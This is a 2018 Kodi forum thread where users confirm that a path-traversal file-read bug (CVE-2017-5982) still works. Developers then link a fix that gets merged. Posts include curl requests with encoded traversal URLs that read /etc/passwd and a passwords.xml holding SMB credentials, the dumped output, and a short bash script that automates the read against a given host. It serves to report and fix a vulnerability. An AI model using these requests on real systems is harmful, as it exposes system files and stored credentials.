Login at Kodi Home

starwarsfan · 2018-09-20, 03:31

I believe the Local File Include (CVE-2017-5982) is back.

I know that bool CFileUtils::ZebraListAccessCheck(const std: Confused

tring &filePath) from xbmc/xbmc/utils/FileUtils.cpp is supposed to block access, it doesn't.

The code from:
https://www.exploit-db.com/exploits/41312/

Still works on:
NOTICE: Starting Kodi (17.6). Platform: Linux ARM (Thumb) 32-bit
NOTICE: Using Release Kodi x32 build (version for Raspberry Pi)
Kodi compiled Jun 7 2018 by GCC 6.3.0 for Linux ARM (Thumb) 32-bit version 4.9.30 (264478)

http://pi/image/image%3A%2F%2F%2e%2e%252...swords.xml
<passwords> <path> <from pathversion="1">smb://smb/media</from> <to pathversion="1">smb://username:password@smb/media/</to> </path> </passwords>

**popcornmix** · 2018-09-21, 14:01

Can you test a Kodi 18 nightly build? There have been no changes to Kodi 17 for many months.

starwarsfan · 2018-09-21, 14:18

I will test tonight.

**Sam.Nazarko** · 2018-09-21, 14:39

You can grab a nightly here: https://discourse.osmc.tv/t/testing-kodi...y-pi/20631 if you wish to test with OSMC still for consistency.

starwarsfan · 2018-09-22, 04:37

On OSMC it still exists,
22:31:01.228 T:1918357504 NOTICE: Starting Kodi (18.0-BETA3). Platform: Linux ARM (Thumb) 32-bit
22:31:01.229 T:1918357504 NOTICE: Using Release Kodi x32 build (version for Raspberry Pi)
22:31:01.229 T:1918357504 NOTICE: Kodi compiled Sep 20 2018 by GCC 6.3.0 for Linux ARM (Thumb) 32-bit version 4.9.30 (264478)

curl http://kodi/image/image%3A%2F%2F%2e%2e%2...252fpasswd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3 Confused

ys:/dev:/usr/sbin/nologin
sync:x:4:65534 Confused

ync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
systemd-timesync:x:101:102 Confused

ystemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:102:103 Confused

ystemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:103:104 Confused

ystemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:104:105 Confused

ystemd Bus Proxy,,,:/run/systemd:/bin/false
ntp:x:105:107::/home/ntp:/bin/false
messagebus:x:106:108::/var/run/dbus:/bin/false
statd:x:107:65534::/var/lib/nfs:/bin/false
avahi:x:108:110:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
osmc:x:1000:1000::/home/osmc:/bin/bash

starwarsfan · 2018-09-22, 04:59

I did a test on a "plain" Kodi 18.0-BETA3 Git:2018921-a2133e4 running on Ubuntu 18.04.1 LTS (kernel: Linux 4.15.0-34-generic) and did not see the vulnerability.

curl http://kodi:8080/image/image%3A%2F%2F%2e...252fpasswd
<html><head><title>File not found</title></head><body>File not found</body></html>

Unless it was fixed between 18.0-BETA3 compiled Sep 20 2018 and 8.0-BETA3 Git:2018921-a2133e4, I will check with OSMC to see what they are adding that is causing the vulnerability to be seen.

**Sam.Nazarko** · 2018-09-22, 17:47

We haven't got any patches here that should introduce this vulnerability.
Try with a file in the Ubuntu user's home folder' as /etc/passwd may simply be inaccessible if running as an unprivileged user.

starwarsfan · 2018-09-24, 14:11

@Sam.Nazarko

The bigger issue is this one:

curl http://kodi/image/image%3A%2F%2F%2e%2e%2...swords.xml
<passwords>
<path>
<from pathversion="1">smb://smb/media</from>
<to pathversion="1">smb://smbuser:password@smb/media/Pictures/</to>
</path>
</passwords>

I replaced my server name with "smb," the user with "smbuser", and the password with "password" because I'm not posting those on the site Smile

Milhouse · (This post was last modified: 2018-09-24, 19:03 by Milhouse.)

This issue has never been fixed to my knowledge, and affects all platforms and not just OSMC.

Ubuntu with latest Kodi 18 *is* vulnerable.

Test script ("kvuln"):

text:


#!/bin/bash



HOST="$1"

XPATH="$2"

XPATH="${XPATH//\//%2F}"

XPATH="${XPATH//%/%25}"



curl -s "http://${HOST}/image/image%3A%2F%2F..${BASE}${XPATH}"

text:


neil@nm-linux:~/projects$ uname -a

Linux nm-linux 4.13.0-46-generic #51-Ubuntu SMP Tue Jun 12 12:36:29 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

neil@nm-linux:~/projects$ /freenas/data/kvuln localhost:8080 /../../etc/passwd

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

...

special://envhome is /home/neil, and paths to be exploited are relative to that root.

An attempt to fix CVE-2017-5982 was proposed but never implemented: https://github.com/xbmc/xbmc/pull/11851

If anything else in this area has been implemented (can't find anything) then it is now a regression.

I'll move this thread to OS Independent/Other.

**yol** · 2018-10-03, 11:29

Fix is underway

https://github.com/xbmc/xbmc/pull/14501

**yol** · 2018-10-14, 14:39

fyi: Fix merged